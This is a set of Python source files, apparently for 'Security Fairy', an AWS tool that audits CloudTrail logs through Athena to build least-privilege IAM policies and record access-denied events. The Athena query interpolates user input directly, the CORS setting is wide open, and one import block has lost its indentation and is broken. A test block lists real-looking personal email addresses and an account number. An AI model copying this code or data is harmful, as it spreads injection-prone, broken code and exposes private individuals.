            <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
            <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
            <style>
            .form {
                padding-left: 1cm;
            }
            .div{
                padding-left: 1cm;
            }
            </style>
            <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
            <script>
            $(document).ready(function(){
                $("button").click(function(){
                    var entity_arn = document.getElementById("entity_arn").value;
                    var dict = {};
                    dict["entity_arn"] = entity_arn;
                    if (document.getElementById("num_days").value != "") {
                        dict["num_days"] = Number(document.getElementById("num_days").value);
                    }
                    else{
                        dict["num_days"] = 30;
                    };
                    $.ajax({
                      type: 'POST',
                      headers: {
                          'Content-Type':'application/json',
                          'Accept':'text/html'
                      },
                      url:'$domain',
                      crossDomain: true,
                      data: JSON.stringify(dict),
                      dataType: 'text',
                      success: function(responseData) {
                          alert(responseData);
                          //document.getElementById("id").innerHTML = responseData;
                          document.getElementById("entity_arn").value="";
                          document.getElementById("num_days").value="";
                      },
                      error: function (responseData) {
                          //alert(responseData);
                          alert('POST failed.'+ JSON.stringify(responseData));
                      }
                    });
                });
            });
            </script>
            </head>
            <title>Security Fairy IAM Policy Remediation Tool</title>
            <h1 class="div">Security Fairy IAM Remediation Tool</h1>
            <body>
            <form class="form" action="" method="post">
            <textarea rows="1" cols="50" name="text" id="entity_arn" placeholder="arn:aws:iam::0123456789:role/roleName"></textarea>
            </form>
            <form class="form" action="" method="post">
            <textarea rows="1" cols="50" name="text" id="num_days" placeholder="Scan the logs for between 1-30 days (Enter Number)"></textarea>
            </form>
            <div class="div"><button class="btn btn-primary">Audit Entity</button></div>
            <div class="div" id="id"></div>
            </body>
            </html>
            """
    return {
        "statusCode": 200,
        "headers": {
            "Content-Type": 'text/html',
            "Access-Control-Allow-Origin": "*"
        },
        # safe_substitute leaves any unknown $placeholders untouched rather
        # than raising, so only $domain is replaced.
        "body": string.Template(body).safe_substitute({"domain": domain})
    }
if __name__ == '__main__':
    # Ad-hoc local check; hits live AWS (iam get_role) via SESSION.
    print(validate_entity_arn('arn:aws:sts::842337631775:assumed-role/1S-Admins/potato'))
--- FILE SEPARATOR ---
"""Athena Query
Submits the appropriate Security Fairy
query to Athena.
"""
import re
import boto3
import logging
from datetime import datetime, timedelta
from setup_logger import create_logger
from botocore.exceptions import ProfileNotFound
# Module logger (setup_logger is a project-local helper).
logger = create_logger(name="athena_query.py", logging_level=logging.INFO)

# Prefer the local 'training' profile; fall back to the default credential
# chain (e.g. the Lambda execution role) when the profile is absent.
try:
    SESSION = boto3.session.Session(profile_name='training',
                                    region_name='us-east-1')
except ProfileNotFound as pnf:
    SESSION = boto3.session.Session()
def lambda_handler(event, context):
    """ Executed by the Lambda service.

    Runs the Athena audit query and stashes its execution id on the event,
    which is then handed to the next state-machine step.
    """
    execution_id = execute_query(event['entity_arn'],
                                 event['num_days'],
                                 event['s3_bucket'])
    event['execution_id'] = execution_id
    return event
def window_calc(num_days):
    """Return (year, zero-padded month) for the date num_days ago.

    num_days may be negative; only its magnitude matters.
    """
    window_start = datetime.now() - timedelta(days=abs(num_days))
    return window_start.year, str(window_start.month).zfill(2)
def execute_query(entity_arn, num_days, s3_bucket):
    """Submit the Security Fairy audit query to Athena.

    Returns the Athena QueryExecutionId for downstream polling.
    """
    escaped_arn = build_escaped_arn(entity_arn)
    year, month = window_calc(num_days)
    hql = f"""
select useridentity.arn as user_arn
, eventsource
, array_distinct(array_agg(eventName)) as actions
from aws_logs.cloudtrail
where year = '{year}'
and month >= '{month}'
and regexp_like(useridentity.arn, '{escaped_arn}\/.+')
group by useridentity.arn
, eventsource
"""
    logger.info(hql)
    result_config = {
        'OutputLocation': f's3://{s3_bucket}/tables',
        'EncryptionConfiguration': {
            'EncryptionOption': 'SSE_S3'
        }
    }
    execution = SESSION.client('athena').start_query_execution(
        QueryString=hql,
        ResultConfiguration=result_config)
    logger.info("Query ID:")
    logger.info(execution['QueryExecutionId'])
    return execution['QueryExecutionId']
def build_escaped_arn(entity_arn):
    """Rewrite a role/assumed-role ARN as a regex-escaped assumed-role prefix."""
    arn_parts = re.split('/|:', entity_arn)
    account_number = arn_parts[4]
    role_name = arn_parts[6]
    escaped_arn = "arn:aws:sts::" + account_number + ":assumed-role\\/" + role_name
    logger.debug(escaped_arn)
    return escaped_arn
if __name__ == '__main__':
    # Local invocation example, kept for reference.  Expected escaped-ARN
    # shape: arn:aws:sts::281782457076:assumed-role\/1s_tear_down_role\/.+
    # lambda_handler(
    #     {
    #         "entity_arn": "arn:aws:iam::281782457076:assumed-role/1s_tear_down_role",
    #         "num_days": "-30",
    #         "s3_bucket": "1s-potato-east"
    #     },
    #     {}
    # )
    pass
--- FILE SEPARATOR ---
import string
import logging
from setup_logger import create_logger
# Module logger shared by the helpers below (setup_logger is project-local).
logger = create_logger(name="aws_api_tools.py")
def api_response(statusCode=500, headers=None, body='Internal Service Error'):
    """Build an API Gateway Lambda-proxy response dict.

    Args:
        statusCode: HTTP status; must be within 100-599.
        headers: response headers; defaults to {'Content-Type': 'text/html'}.
        body: response body string.

    Raises:
        ValueError: when statusCode is outside the valid HTTP range.
    """
    # Bug fix: the default headers dict was a mutable default argument,
    # shared across every call; build it per call instead.
    if headers is None:
        headers = {'Content-Type': 'text/html'}
    if statusCode < 100 or statusCode > 599:
        raise ValueError('Invalid HTTP statusCode')
    return_value = {
        'statusCode': statusCode,
        'headers': headers,
        'body': body
    }
    logger.debug(return_value)
    return return_value
def get_domain_from_proxy_api_gateway(event):
    """Derive the site's base URL from a proxy-integration event.

    Test invocations (no headers) get a placeholder; execute-api hosts
    include the stage segment, custom domains do not.
    """
    headers = event['headers']
    if headers is None:
        return "https://testinvocation/approve"
    host = headers['Host']
    if 'amazonaws.com' not in host:
        return "https://{domain}/".format(domain=host)
    return "https://{domain}/{stage}/".format(domain=host,
                                              stage=event['requestContext']['stage'])
def api_website(website_body='', safe_substitute_dict=None):
    """Render an HTML page with $variable substitution and wrap it in a 200.

    Every key in safe_substitute_dict must appear in the supplied body as a
    $variable placeholder, otherwise a ValueError is raised.

    Raises:
        ValueError: when a substitution key has no $placeholder in the body.
    """
    # Bug fix: the default dict was a mutable default argument shared
    # across calls; build it per call instead.
    if safe_substitute_dict is None:
        safe_substitute_dict = {'domain': 'http://example.domain'}
    logger.debug(website_body)
    logger.debug(safe_substitute_dict)
    body = website_body if website_body else \
        """
        <html>
            <body>
                <title>Webpage serverd from API Gateway and Lambda</title>
                <h1>This is an example of an HTTP Get Responses for a Lambda/API Gateway served website</h1>
                The domain is: $domain
            </body>
        </html>
        """
    logger.debug(body)
    if website_body and safe_substitute_dict:
        for variable in safe_substitute_dict:
            # '${variable}'.format(...) yields e.g. '$domain'.
            if '${variable}'.format(variable=variable) not in body:
                logger.debug('${variable}'.format(variable=variable))
                raise ValueError('A variable to be replaced in the body must be represented by a $variable')
    compiled_body = string.Template(body).safe_substitute(safe_substitute_dict)
    logger.debug(compiled_body)
    return api_response(statusCode=200, body=compiled_body)
--- FILE SEPARATOR ---
import logging
import json
import re
class IAMPolicy:
    """Accumulates service:action pairs and renders an IAM policy document."""

    def __init__(self, logging_level=logging.DEBUG):
        logging.basicConfig(level=logging_level)
        self.statements = []
        self.service_actions = {}
        # IAM inline-policy document size limits, in characters.
        self.max_policy_size = {
            'user' : 2048,   # User policy size cannot exceed 2,048 characters
            'role' : 10240,  # Role policy size cannot exceed 10,240 characters
            'group': 5120    # Group policy size cannot exceed 5,120 characters
        }

    def __add_statement__(self, statement):
        if not isinstance(statement, IAMStatement):
            raise Exception('This Method only supports objects of type IAMStatement')
        self.statements.append(statement)

    def add_actions(self, statement_actions):
        """Record a list of 'service:ApiAction' strings."""
        for statement_action in statement_actions:
            self.add_action(statement_action)

    def add_action(self, statement_action):
        """Record one 'service:ApiAction' string, deduplicated per service.

        Raises:
            InvalidStatementAction: when the action is not 'service:api-action'.
        """
        split_statement_action = statement_action.split(':')
        if len(split_statement_action) != 2:
            # Bug fix: the error message previously referenced the undefined
            # name 'action', raising NameError instead of the intended error.
            raise InvalidStatementAction(
                'Invalid Statement: {action} Statement must be \'service:api-action\'.'
                .format(action=statement_action))
        service = self.__get_service_alias__(split_statement_action[0])
        action = split_statement_action[1]
        if service == 'lambda':
            # Strip extraneous lambda api version suffixes, e.g.
            #   lambda:ListTags20170331
            #   lambda:GetFunctionConfiguration20150331v2
            api_version_info = re.findall(r"(\d+v\d+)|(\d+)", action)
            if api_version_info:
                for api_version in api_version_info[0]:
                    logging.debug(api_version)
                    # Bug fixes: use != (not the identity test 'is not') for
                    # string comparison, and only replace non-empty groups —
                    # the old else branch reset 'action' back to the
                    # unstripped name whenever the other regex group was empty.
                    if api_version != '':
                        action = action.replace(api_version, '')
        logging.debug(statement_action)
        logging.debug(self.service_actions.get(service))
        if self.service_actions.get(service) is None:
            self.service_actions[service] = []
        if action not in self.service_actions[service]:
            self.service_actions[service].append(action)
            logging.debug("Action added: {service}:{action}".format(service=service, action=action))

    def __get_service_alias__(self, service):
        # Some CloudTrail event sources use a different prefix than IAM does.
        service_aliases = {
            "monitoring": "cloudwatch"
        }
        return service_aliases.get(service, service)

    def __build_statements__(self):
        # One Allow statement per service, covering its collected actions.
        for service in self.service_actions:
            actions_per_service = [service + ":" + action
                                   for action in self.service_actions[service]]
            statement = IAMStatement(effect="Allow",
                                     actions=actions_per_service,
                                     resource="*",
                                     sid='SecurityFairyBuilt{service}Policy'.format(service=service.capitalize()))
            self.__add_statement__(statement)

    def get_policy(self):
        """Render the accumulated actions as an IAM policy document dict."""
        self.__build_statements__()
        built_policy_statements = [statement.get_statement()
                                   for statement in self.statements]
        policy = {
            "Version": "2012-10-17",
            "Statement": built_policy_statements
        }
        logging.debug(policy)
        return policy

    def print_policy(self):
        """Return the policy document serialized as JSON."""
        return json.dumps(self.get_policy())
class IAMStatement:
    """A single IAM policy statement (Effect/Action/Resource plus optional Sid)."""

    def __init__(self, effect, actions, resource, sid='', logging_level=logging.DEBUG):
        logging.basicConfig(level=logging_level)
        self.validate_statement(effect, actions, resource)
        self.actions = actions
        self.resource = resource
        self.effect = effect
        # Bug fix: always set the attribute — get_statement() reads self.sid
        # unconditionally and previously raised AttributeError when sid was ''.
        self.sid = sid

    def validate_statement(self, effect, actions, resource):
        """Raise when effect/resource/actions are malformed.

        Raises:
            InvalidStatementAction: for a bad effect or malformed action.
            Exception: for any resource other than '*'.
        """
        if not effect.lower() in ['allow', 'deny']:
            logging.debug(effect)
            raise InvalidStatementAction("Valid Effects are 'Allow' and 'Deny'.")
        if not resource == '*':
            logging.debug(resource)
            raise Exception('Invalid Resource.')
        logging.debug(actions)
        for action in actions:
            if len(action.split(':')) != 2:
                raise InvalidStatementAction('Invalid Statement: {action} Statement must be \'service:api-action\'.'.format(action=action))
        self.actions = actions

    def get_statement(self):
        """Render this statement as a policy-document dict.

        Raises:
            Exception: when the statement holds no actions.
        """
        if self.actions == []:
            raise Exception('This statement has no Actions')
        statement = {
            "Effect": self.effect,
            "Resource": self.resource,
            "Action": self.actions
        }
        if self.sid != '':
            statement['Sid'] = self.sid
        return statement
--- FILE SEPARATOR ---
import boto3
import logging
from botocore.exceptions import ProfileNotFound
class AWS_Session:
    """Caches a boto3 Session built from a named profile, with a
    default-credential-chain fallback."""

    def __init__(self, region_name='us-east-1', profile_name='training'):
        self.region_name = region_name
        self.profile_name = profile_name
        self.session = self.__create_new_session__()

    def __create_new_session__(self):
        """Build a session from the configured profile, falling back to the
        default credential chain when the profile does not exist."""
        logging.debug("Creating a new boto3 Session object.")
        try:
            session = boto3.session.Session(profile_name=self.profile_name,
                                            region_name=self.region_name)
            logging.debug(session)
        except ProfileNotFound:
            session = boto3.session.Session()
        return session

    def get_session(self):
        """Return the cached session, rebuilding it when missing or expired.

        Bug fix: the original condition was inverted ('not self.session is
        None or ...'), so a healthy session was rebuilt on every call and a
        None session crashed on get_credentials(); it also called a
        class-private '__is_expired' name that name-mangling made
        unresolvable.
        """
        credentials = None if self.session is None else self.session.get_credentials()
        # NOTE(review): only botocore RefreshableCredentials expose
        # refresh_needed(); probe defensively and treat missing credentials
        # as expired — confirm against the botocore credentials API.
        expired = (credentials is None
                   or bool(getattr(credentials, 'refresh_needed', lambda: False)()))
        if self.session is None or expired:
            logging.debug("AWS Session expired.")
            self.session = self.__create_new_session__()
        return self.session
--- FILE SEPARATOR ---
"""Build_Cloudtrail_Table
Create the CloudTrail Logs table for Athena use.
See the AWS documentation for Athena here:
http://docs.aws.amazon.com/athena/latest/ug/getting-started.html
"""
import os
import sys
import json
from datetime import datetime, timedelta
import logging
import boto3
from botocore.exceptions import ProfileNotFound
from time import sleep
# These parameters should remain static
TIME = datetime.utcnow()                    # single timestamp captured at import
AMZ_DATE = TIME.strftime('%Y%m%dT%H%M%SZ')  # AWS-style compact timestamp
DATE_STAMP = TIME.strftime('%Y%m%d')
PROFILE = 'sandbox'                         # local profile; ignored in Lambda
LOG_LEVEL = logging.DEBUG
SUCCESS = "SUCCESS"                         # CloudFormation custom-resource statuses
FAILED = "FAILED"
# Prefer the local named profile; fall back to the default credential chain
# (e.g. the Lambda execution role) when it is absent.
try:
    SESSION = boto3.session.Session(
        profile_name=PROFILE,
        region_name='us-east-1'
    )
except ProfileNotFound as pnf:
    SESSION = boto3.session.Session()
try:
from urllib import HTTPError, build_opener, HTTPHandler, Request
except ImportError:
from urllib.error import HTTPError
from urllib.request import build_opener, HTTPHandler, Request
def send(event, context, response_status, reason=None, response_data=None, physical_resource_id=None):
    """PUT a CloudFormation custom-resource response to event['ResponseURL'].

    Args:
        event: the CloudFormation custom-resource request event.
        context: Lambda context (log_stream_name is used as a fallback id).
        response_status: "SUCCESS" or "FAILED".

    Returns:
        True when the PUT succeeded, False on an HTTP error.
    """
    response_data = response_data or {}
    response_body = json.dumps(
        {
            'Status': response_status,
            'Reason': reason or "See the details in CloudWatch Log Stream: " + context.log_stream_name,
            'PhysicalResourceId': physical_resource_id or context.log_stream_name,
            'StackId': event['StackId'],
            'RequestId': event['RequestId'],
            'LogicalResourceId': event['LogicalResourceId'],
            'Data': {'ConfigJson': response_data}
        }
    )
    logging.debug("Sending Response to CloudFormation")
    logging.debug(response_body)
    opener = build_opener(HTTPHandler)
    request = Request(event['ResponseURL'], data=response_body.encode('utf-8'))
    # CloudFormation requires an empty Content-Type on the pre-signed URL.
    request.add_header('Content-Type', '')
    request.add_header('Content-Length', len(response_body.encode('utf-8')))
    request.get_method = lambda: 'PUT'
    # Bug fix: the request was previously opened twice — once unguarded
    # outside the try — double-PUTting the response and letting network
    # errors escape the function.
    try:
        response = opener.open(request)
        print("Status code: {}".format(response.getcode()))
        print("Status message: {}".format(response.msg))
        return True
    except HTTPError as exc:
        print("Failed executing HTTP request: {}".format(exc.code))
        return False
def save_query(cloudtrail_logs_bucket):
    """Store the CloudTrail table creation query as an Athena named query.

    Idempotent: creation is skipped when a named query called
    'cloudtrail_logs' already exists.

    Args:
        cloudtrail_logs_bucket: bucket holding the AWSLogs/ CloudTrail dump.

    Returns:
        The create_named_query response, or None when the query already existed.
    """
    athena = SESSION.client('athena')
    acct_number = SESSION.client('sts').get_caller_identity().get('Account')
    # Collect the names of every existing named query.
    query_list = athena.list_named_queries()
    name_list = []
    for query in query_list.get("NamedQueryIds"):
        check = athena.get_named_query(
            NamedQueryId=query
        )
        name_list.append(check['NamedQuery'].get('Name'))
    # Bug fix: 'response' was previously unbound on this path, so the final
    # return raised NameError whenever the query was already saved.
    response = None
    if "cloudtrail_logs" in name_list:
        print("This query is already saved.")
    else:
        # Hive DDL for the CloudTrail schema; see
        # http://docs.aws.amazon.com/athena/latest/ug/getting-started.html
        response = athena.create_named_query(
            Name="cloudtrail_logs",
            Description="Table of CloudTrail Logs created by Security Fairy.",
            Database="aws_logs",
            QueryString="""
create external table if not exists aws_logs.cloudtrail (
eventVersion string,
userIdentity
struct<
type: string,
principalId: string,
arn: string,
accountId: string,
userName: string,
invokedBy: string,
accesskeyid:string,
sessioncontext:
struct<
attributes:
struct<
mfaauthenticated:string,
creationdate:string
>,
sessionIssuer:
struct<
type:string,
principalId:string,
arn:string,
accountId:string,
userName:string
>
>
>,
eventTime string,
eventSource string,
eventName string,
awsRegion string,
sourceIPAddress string,
userAgent string,
errorCode string,
errorMessage string,
requestID string,
eventID string,
resources
array<
struct<
ARN:string,
accountId:string,
type:string
>
>,
eventType string,
apiVersion string,
readOnly boolean,
recipientAccountId string,
sharedEventID string,
vpcEndpointId string
)
partitioned by (region STRING, year STRING, month STRING, day STRING)
row format serde 'com.amazon.emr.hive.serde.CloudTrailSerde'
stored as inputformat 'com.amazon.emr.cloudtrail.CloudTrailInputFormat'
outputformat 'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
location 's3://{cloudtrail_bucket}/AWSLogs/{account_number}/CloudTrail/'
;""" \
            .format(cloudtrail_bucket=cloudtrail_logs_bucket,
                    account_number=acct_number)
        )
    return response
def build_database(s3_bucket):
    """Build the logs database in Athena (idempotent).

    Returns:
        The start_query_execution response — previously assigned but
        silently dropped; returning it matches the other Athena helpers
        in this file (the caller only logs it).
    """
    athena = SESSION.client('athena')
    output = 's3://{s3_bucket}/tables'.format(s3_bucket=s3_bucket)
    config = {
        'OutputLocation': output,
        'EncryptionConfiguration': {
            'EncryptionOption': 'SSE_S3'
        }
    }
    response = athena.start_query_execution(
        QueryString="create database if not exists aws_logs;",
        ResultConfiguration=config
    )
    return response
def execute_cloudtrail_table_creation(s3_bucket):
    """Create the CloudTrail Logs table using the saved named query.

    Raises:
        ValueError: when no saved query named 'cloudtrail_logs' exists —
        previously this path submitted an empty query string / raised an
        unbound-variable NameError.
    """
    athena = SESSION.client('athena')
    query_list = athena.list_named_queries()
    output = 's3://{s3_bucket}/tables'.format(s3_bucket=s3_bucket)
    config = {
        'OutputLocation': output,
        'EncryptionConfiguration': {
            'EncryptionOption': 'SSE_S3'
        }
    }
    run_query = ''
    for query_id in query_list.get("NamedQueryIds"):
        query_details = athena.get_named_query(
            NamedQueryId=query_id
        )['NamedQuery']
        if query_details.get('Name') == 'cloudtrail_logs':
            run_query = query_details.get('QueryString')
            break
    if not run_query:
        raise ValueError("Saved query 'cloudtrail_logs' was not found.")
    response = athena.start_query_execution(
        QueryString=run_query,
        ResultConfiguration=config
    )
    return response
def build_inital_partitions(security_fairy_bucket, cloudtrail_bucket, account):
    """Register the last 30 days of CloudTrail partitions per active region."""
    athena_client = SESSION.client('athena')
    output = f"s3://{security_fairy_bucket}/security-fairy-partition-queries"
    # Only the US regions are enabled for now; the remaining commercial and
    # gov regions were intentionally disabled in the original list.
    regions = ['us-west-2',
               'us-west-1',
               'us-east-2',
               'us-east-1']
    config = {
        'OutputLocation': output,
        'EncryptionConfiguration': {
            'EncryptionOption': 'SSE_S3'
        }
    }
    for region in regions:
        try:
            for day_offset in range(30):
                partition_date = datetime.now() - timedelta(day_offset)
                response = athena_client.start_query_execution(
                    QueryString=f"ALTER TABLE aws_logs.cloudtrail ADD IF NOT EXISTS PARTITION (region='{region}', year={partition_date.year}, month={partition_date.month}, day={partition_date.day}) LOCATION 's3://{cloudtrail_bucket}/AWSLogs/{account}/CloudTrail/{region}/{partition_date.year}/{partition_date.month}/{partition_date.day}/'; ",
                    ResultConfiguration=config
                )
                # TODO: switch to the module logger
                print(response)
        except Exception as e:
            print(e)
def lambda_handler(event, context):
    """Lambda Handler for Build_Cloudtrail_Table

    CloudFormation custom-resource entry point: saves the table DDL as an
    Athena named query, builds the aws_logs database, creates the
    cloudtrail table, registers initial partitions, then reports
    SUCCESS/FAILED back to CloudFormation via send().
    """
    logging.debug(json.dumps(event))
    # Setup Logging, delete other loggers
    root = logging.getLogger()
    if root.handlers:
        for handler in root.handlers:
            root.removeHandler(handler)
    logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=LOG_LEVEL, datefmt='%Y-%m-%dT%H:%M:%S')
    logging.getLogger('boto3').setLevel(logging.WARNING)
    logging.getLogger('botocore').setLevel(logging.WARNING)
    logging.debug("Environment Variables:")
    logging.info("Start Execution")
    try:
        cloudtrail_bucket = os.environ["cloudtrail_bucket"]
        security_fairy_bucket = os.environ["security_fairy_bucket"]
        account = os.environ["aws_account"]
        log_level = os.environ.get('LOG_LEVEL','INFO') # Logging Level
        saved = save_query(cloudtrail_bucket)
        logging.debug(saved)
        db = build_database(cloudtrail_bucket)
        logging.debug(db)
        executed = execute_cloudtrail_table_creation(cloudtrail_bucket)
        build_inital_partitions(security_fairy_bucket, cloudtrail_bucket, account)
        logging.debug(executed)
        logging.info("Successful Execution")
        send(event, context, "SUCCESS")
    except Exception as error:
        # Any failure must still notify CloudFormation, or the stack
        # operation hangs until timeout.
        logging.info("Failed Execution")
        logging.info(error)
        send(event, context, "FAILED")
        return "Error"
if __name__ == '__main__':
    # NOTE(review): passes {} as context, but the failure path calls send(),
    # which reads context.log_stream_name — confirm this local entry works.
    lambda_handler({}, {})
--- FILE SEPARATOR ---
import boto3
import gzip
import json
import logging
import os
import re
from tools import Arn
from setup_logger import create_logger
from aws_session_manager import AWS_Session
from botocore.exceptions import ProfileNotFound
# Module logger (setup_logger is a project-local helper).
logger = create_logger(name="denied_notification.py")

# Prefer the local 'training' profile; fall back to the default credential
# chain (e.g. the Lambda execution role) when the profile is absent.
try:
    SESSION = boto3.session.Session(profile_name='training',
                                    region_name='us-east-1')
except ProfileNotFound as pnf:
    SESSION = boto3.session.Session()
def lambda_handler(event, context):
    """Process an S3-delivered CloudTrail log file for access-denied events.

    Downloads the gzipped log object, extracts unique access-denied
    records, persists those belonging to Security-Fairy-audited roles to
    DynamoDB, and publishes an SNS notification for all denied events.
    """
    # global SESSION
    # SESSION = SESSION.get_session()
    topic_arn = os.environ.get('sns_arn', 'arn:aws:sns:us-east-1:281782457076:security_fairy_topic')
    dynamodb_table = os.environ.get('dynamodb_table', 'arn:aws:dynamodb:us-east-1:281782457076:table/security_fairy_dynamodb_table')
    # Extract Bucket and Key from an SNS notification
    # message = json.loads(event['Records'][0]['Sns']['Message'])
    # bucket = message['s3Bucket']
    # key = message['s3ObjectKey'][0]
    # Extracted Bucket and Key from S3 event notification
    bucket = event['Records'][0]['s3']['bucket']['name']
    key = event['Records'][0]['s3']['object']['key']
    # where to save the downloaded file
    file_path = '/tmp/cloudtraillogfile.gz'
    # downloads file to above path
    boto3.client('s3').download_file(bucket, key, file_path)
    # opens gz file for reading
    gzfile = gzip.open(file_path, 'r')
    # loads contents of the Records key into variable (our actual cloudtrail log entries!)
    # NOTE(review): assumes the entire JSON document sits on the first line —
    # confirm CloudTrail delivery always writes single-line JSON.
    records = json.loads(gzfile.readlines()[0])['Records']
    access_denied_records = check_records_for_error_code(records)
    security_fairy_access_denied_records = get_security_fairy_audited_entities(access_denied_records)
    write_denied_actions_to_dynamodb(security_fairy_access_denied_records, dynamodb_table)
    send_access_denied_notifications(access_denied_records, topic_arn)
def check_records_for_error_code(records, error_codes=('AccessDenied', 'AccessDeniedException', 'Client.UnauthorizedOperation')):
    """Extract unique access-denied events from CloudTrail records.

    Args:
        records: list of CloudTrail record dicts.
        error_codes: errorCode values that count as access denied — a tuple
            now, since a mutable default list is shared across calls.

    Returns:
        List of dicts with 'arn', 'error_code' and 'denied_action' keys,
        deduplicated in input order.
    """
    matched_error_records = []
    for record in records:
        if record.get('errorCode') in error_codes:
            logger.debug(record)
            arn = Arn(record['userIdentity'].get('arn'))
            service_name = arn.get_service()
            extracted_information = {
                'arn': arn.get_full_arn(),
                'error_code': record['errorCode'],
                'denied_action': service_name + ':' + record['eventName']
            }
            if extracted_information not in matched_error_records:
                logger.info('extracted_information doesn\'t already exist in list of access denieds')
                matched_error_records.append(extracted_information)
    logger.debug(matched_error_records)
    return matched_error_records
def send_access_denied_notifications(access_denied_records, topic_arn):
    """Publish an SNS notification when any access-denied events were found."""
    if not access_denied_records:
        return
    sns_client = boto3.client('sns', region_name='us-east-1')
    sns_client.publish(TopicArn=topic_arn,
                       Message=json.dumps(access_denied_records),
                       Subject='Automated AWS Notification - Access Denied')
def write_denied_actions_to_dynamodb(access_denied_records, dynamodb_table):
    """Merge newly denied actions into each entity's DynamoDB item.

    Input records look like:
        {"error_code": "AccessDenied",
         "arn": "arn:aws:sts::...:assumed-role/role/session",
         "denied_action": "states:StartExecution"}

    Items that already contain the action are left untouched — previously
    the item was rewritten with an identical string set on every call.
    """
    dynamodb_client = SESSION.client('dynamodb')
    for record in access_denied_records:
        entity_arn = record['arn']
        execution_id, existing_denied_actions = get_existing_denied_actions(entity_arn, dynamodb_table)
        if record['denied_action'] in existing_denied_actions:
            # Nothing new to record; skip the redundant write.
            continue
        # Build a fresh list rather than aliasing/mutating the one returned
        # by get_existing_denied_actions.
        updated_denied_actions = existing_denied_actions + [record['denied_action']]
        dynamodb_client.update_item(TableName=dynamodb_table,
                                    Key={
                                        "execution_id": {
                                            "S": execution_id
                                        }
                                    },
                                    AttributeUpdates={
                                        "denied_actions": {
                                            "Value": {"SS": updated_denied_actions}
                                        }
                                    })
def get_security_fairy_audited_entities(access_denied_records):
    """Filter records down to roles whose policies were built by Security Fairy.

    Rewrites each kept record's 'arn' to the underlying role ARN.
    """
    audited_entities = []
    for record in access_denied_records:
        entity = Arn(record['arn'])
        entity.convert_assumed_role_to_role()
        role_arn = entity.get_full_arn()
        logger.debug(role_arn)
        if entity.is_role() and is_access_denied_security_fairy_audited_role(role_arn):
            logger.debug('Adding access_denied_record to list')
            record['arn'] = role_arn
            audited_entities.append(record)
    logger.info(audited_entities)
    return audited_entities
def get_existing_denied_actions(entity_arn, dynamodb_table):
    """Look up the stored denied-action set for one entity ARN.

    Returns a (execution_id, denied_actions) tuple taken from the first
    matching DynamoDB item; the action list is empty when no actions have
    been stored yet for this entity.
    """
    client = SESSION.client('dynamodb')
    item = client.scan(
        TableName=dynamodb_table,
        IndexName='entity_arn',
        AttributesToGet=['execution_id', 'entity_arn', 'denied_actions'],
        ScanFilter={
            'entity_arn': {
                'AttributeValueList': [{'S': entity_arn}],
                'ComparisonOperator': 'EQ'
            }
        })['Items'][0]
    stored = item.get('denied_actions')
    existing_denied_actions = [] if stored is None else stored['SS']
    execution_id = item['execution_id']['S']
    logger.info(existing_denied_actions)
    return execution_id, existing_denied_actions
def is_access_denied_security_fairy_audited_role(role_arn):
    """Return True when the role carries a Security-Fairy revised policy.

    A role counts as audited when any attached managed policy's name
    contains '-security-fairy-revised-policy' — the naming convention used
    by security_fairy_revised_policy_approve.py when it creates the policy.
    """
    iam_client = SESSION.client('iam')
    role = Arn(role_arn)
    role_name = role.get_entity_name()
    logger.info(role_name)
    logger.debug("Policies attached to {}:".format(role.get_full_arn()))
    attached = iam_client.list_attached_role_policies(RoleName=role_name)
    for attached_policy in attached['AttachedPolicies']:
        logger.info(attached_policy['PolicyName'])
        if '-security-fairy-revised-policy' in attached_policy['PolicyName']:
            return True
    return False
if __name__ == '__main__':
    # Local smoke test: feeds a canned batch of access-denied records through
    # the Security Fairy audit filter, then persists the hits to DynamoDB.
    # NOTE(review): this hits real AWS (IAM + DynamoDB) when executed.
    # arn = 'arn:aws:iam::281782457076:role/1s_tear_down_role'
    # logging.info(is_access_denied_security_fairy_audited_role(arn))
    access_denied_records = [{"error_code": "AccessDenied", "arn": "arn:aws:sts::281782457076:assumed-role/serverless_api_gateway_step_functions/BackplaneAssumeRoleSession", "denied_action": "states:StartExecution"},
                             {"error_code": "AccessDenied", "arn": "arn:aws:sts::281782457076:assumed-role/1s_tear_down_role/potato", "denied_action": "route53:CreateHostedZone"},
                             {"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:user/dbrewer@experlogix.com", "denied_action": "codebuild:StartBuild"},
                             {"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:user/tj.eaglescout@gmail.com", "denied_action": "codebuild:StartBuild"},
                             {"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:user/chase.thompson-baugh@simplymac.com", "denied_action": "codebuild:StartBuild"},
                             {"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:user/steven.nourse@vivintsolar.com", "denied_action": "codebuild:StartBuild"},
                             {"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:role/1s_tear_down_role", "denied_action": "codebuild:StartBuild"}]
    # dynamodb_table = 'security_fairy_dynamodb_table'
    # existing_denied_actions('arn:aws:iam::281782457076:role/1s_tear_down_role', dynamodb_table)
    security_fairy_access_denied_records = get_security_fairy_audited_entities(access_denied_records)
    write_denied_actions_to_dynamodb(security_fairy_access_denied_records,'security_fairy_dynamodb_table')
    # Earlier test harness kept for reference: a sample S3 put-notification
    # event of the shape this module's lambda_handler consumes.
    # if __name__ == '__main__':
    #     EVENT = {
    #       "Records": [
    #         {
    #           "eventVersion": "2.0",
    #           "eventTime": "2017-08-23T17:27:20.482Z",
    #           "requestParameters": {
    #             "sourceIPAddress": "184.72.102.183"
    #           },
    #           "s3": {
    #             "configurationId": "log_posted",
    #             "object": {
    #               "eTag": "f88cc0ba387febb9d1922bcf3624e249",
    #               "sequencer": "00599DBAF77B4804AE",
    #               "key": "AWSLogs/281782457076/CloudTrail/us-east-1/2017/08/23/281782457076_CloudTrail_us-east-1_20170823T1725Z_Nobz9PDTfkS2itSG.json.gz",
    #               "size": 4342
    #             },
    #             "bucket": {
    #               "arn": "arn:aws:s3:::1strategy-training-traillogs",
    #               "name": "1strategy-training-traillogs",
